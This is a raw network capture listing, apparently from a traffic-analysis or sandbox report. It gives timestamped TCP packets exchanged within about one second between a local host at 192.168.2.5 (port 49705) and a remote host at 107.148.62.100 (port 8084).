Dec 18, 2024 13:32:08.250967979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.251468897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.251523972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.255116940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.255445004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.255498886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.256000996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.258189917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.258239031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.258534908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.258936882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.258999109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.263356924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.263669968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.263720036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.264437914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.312030077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.343590975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.343784094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.343842030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.344185114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.344494104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.344557047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.344966888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.345467091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.345530987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.347136974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.347476959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.347531080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.347953081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.349865913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.350505114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.350594997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.350840092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.351772070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.352786064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.353034973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.353097916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.353586912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.354604959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.354717016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.354877949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.355427027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.355489016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.368352890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.368633986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.368690014 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.369215012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.424201965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.435374975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.435616970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.435698986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.436161995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.436446905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.436506987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.436974049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.437629938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.440177917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.449822903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.450037956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.450102091 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.450463057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.451277971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.451343060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.451688051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.452295065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.453973055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.454031944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.454287052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.454781055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.454837084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.456685066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.456974030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.457030058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.457561970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.457618952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.459673882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.460058928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.460114956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.460448027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.461888075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.461944103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.462176085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.462544918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.463852882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.465045929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.465622902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.465679884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.466350079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.470266104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.470601082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.470662117 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.470916033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.472193003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.472399950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.472718954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.472774982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.472940922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.477495909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.477796078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.477849007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.478327036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.480180979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.558532000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.558907032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.559093952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.559262991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.560120106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.560195923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.560405016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.560825109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.562053919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.562246084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.562668085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.562787056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.564106941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.564270973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.564281940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.564342022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.564857006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.566534042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.566853046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.566915989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.567357063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.568972111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.569037914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.569266081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.569322109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.569832087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.583466053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.583699942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.583760977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.584280968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.584636927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.649480104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.649702072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.649888039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.650197029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.650557041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.650625944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.651217937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.651730061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.654284954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.663564920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.663983107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.664103031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.664392948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.665103912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.665193081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.665501118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.666048050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.666100979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.667756081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.667870998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.667937040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.668489933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.670577049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.670644045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.670878887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.671402931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.672174931 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.673238993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.673607111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.674105883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.674175978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.676096916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.676187038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.676295996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.676712036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.676768064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.679238081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.679594040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.679899931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.679966927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.683335066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.683423996 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.683587074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.684150934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.685821056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.685888052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.686120987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.686666965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.686824083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.691436052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.691787958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.691859961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.692249060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.696197033 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.771749973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.772022009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.772136927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.772613049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.772784948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.772840977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.773318052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.773849964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.773910046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.775518894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.775801897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.775861979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.776444912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.778065920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.778116941 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.778696060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.778939962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.779026031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.780523062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.780831099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.780893087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.781469107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.783498049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.783550978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.783812046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.784461975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.784516096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.796932936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.797096014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.797149897 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.797663927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.841681957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.863579035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.863763094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.863846064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.864258051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.864567041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.864641905 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.865125895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.865695000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.865746975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.877759933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.878142118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.878243923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.878580093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.879133940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.879200935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.879369020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.879923105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.879993916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.881486893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.881800890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.881870031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.882297993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.886631966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.886682987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.889306068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891222954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891282082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.891307116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891335964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891347885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891383886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.891479969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891493082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.891527891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.892652035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.892704010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.893436909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.894041061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.894088030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.895035982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.897677898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.897726059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.897939920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.898736000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.898787022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.900186062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.900384903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.900438070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.900827885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.905664921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.905715942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.906095982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.906672955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.906718016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.986161947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.986710072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.986783981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.987291098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.987570047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.987622023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.987981081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.988328934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.988374949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.990331888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.990844011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.990894079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.991391897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.992331028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.992383957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.992588043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.993251085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.993299961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.994889975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.995273113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.995335102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.995697975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.998016119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.998064041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.998250961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.998579979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.998627901 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.011504889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.011847019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.011898994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.012397051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.067097902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.077492952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.077749968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.077814102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.078267097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.078699112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.078744888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.079149961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.079375029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.079430103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.079873085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.092609882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.092663050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.092885017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.093446016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.093494892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.093657017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.094161034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.094208002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.094594955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.095933914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.095974922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.096261978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.096643925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.096693993 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.098468065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.098685980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.098737001 CET	49705	8084	192.168.2.5	107.148.62.100
